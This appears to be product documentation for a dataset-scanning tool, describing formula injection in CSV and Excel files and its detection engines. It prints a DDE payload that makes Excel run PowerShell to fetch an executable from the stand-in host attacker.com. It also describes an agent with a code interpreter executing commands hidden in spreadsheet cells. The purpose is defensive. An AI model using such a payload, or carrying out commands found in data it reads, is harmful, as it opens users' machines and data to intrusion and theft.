Skip to main content

CSV & Excel Formula Injection in AI Datasets

While much of the AI security discourse focuses on unstructured text (PDFs, Markdown), the backbone of machine learning models and enterprise RAG systems is structured tabular data (.csv, .xlsx, .parquet). Adversaries are increasingly targeting these formats using Formula Injection (also known as CSV Injection) and malicious macros.

This attack vector threatens two distinct targets: the Data Scientists processing the data, and Autonomous AI Agents executing Code Interpreters.

The Mechanics of Formula Injection

Formula Injection occurs when an application improperly sanitizes user-supplied data before exporting it to a spreadsheet format. If a cell begins with specific trigger characters (=, +, -, or @), spreadsheet software (like Microsoft Excel or LibreOffice) interprets the cell contents as an executable formula rather than a static string.

Threat Scenario 1: Compromising the Data Scientist

An attacker injects a malicious payload into a web form (e.g., a user registration field):

=cmd|'/C powershell IEX(wget attacker.com/shell.exe)'!A0

When a Data Scientist downloads the database dump as a .csv or .xlsx file and opens it locally to perform Exploratory Data Analysis (EDA), Excel attempts to resolve the Dynamic Data Exchange (DDE) formula. This silently executes the PowerShell payload, granting the attacker a reverse shell on the engineer's workstation, providing direct access to the corporate ML infrastructure.

Threat Scenario 2: Hijacking Agentic AI

Modern LLMs are often equipped with "Code Interpreter" tools (e.g., Python REPLs) to analyze datasets dynamically. If an Autonomous Agent is instructed to read a poisoned .xlsx file and execute operations based on cell contents, the Agent may inadvertently execute the injected system commands or retrieve malicious URLs embedded in the dataset, leading to Server-Side Request Forgery (SSRF) or Data Exfiltration.

The Veritensor Defense Strategy

Veritensor v1.6 introduces dedicated engines to sanitize structured and tabular datasets before they reach the Data Science team or the RAG pipeline.

  • Excel Engine (openpyxl Integration): Veritensor parses .xlsx and .xlsm files natively. It iterates through worksheet cells, explicitly scanning for strings that begin with formula triggers (=, +, -, @). If a formula contains dangerous execution keywords (cmd, powershell, exec), the scanner flags a HIGH severity Formula Injection threat and blocks the pipeline.
  • Macro Scanning (oletools): For legacy and macro-enabled formats (.xlsm, .docm), the Veritensor Control Plane utilizes oletools to extract and analyze VBA macros. It detects AutoExec triggers and suspicious obfuscation techniques, neutralizing droppers before they can execute.
  • Dataset Streaming (.parquet, .csv): For massive datasets (100GB+), Veritensor employs a streaming analysis architecture. It samples chunks of the dataset without exhausting system RAM, scanning for embedded malicious URLs, Prompt Injections, and PII leaks, ensuring the training corpus is cryptographically clean.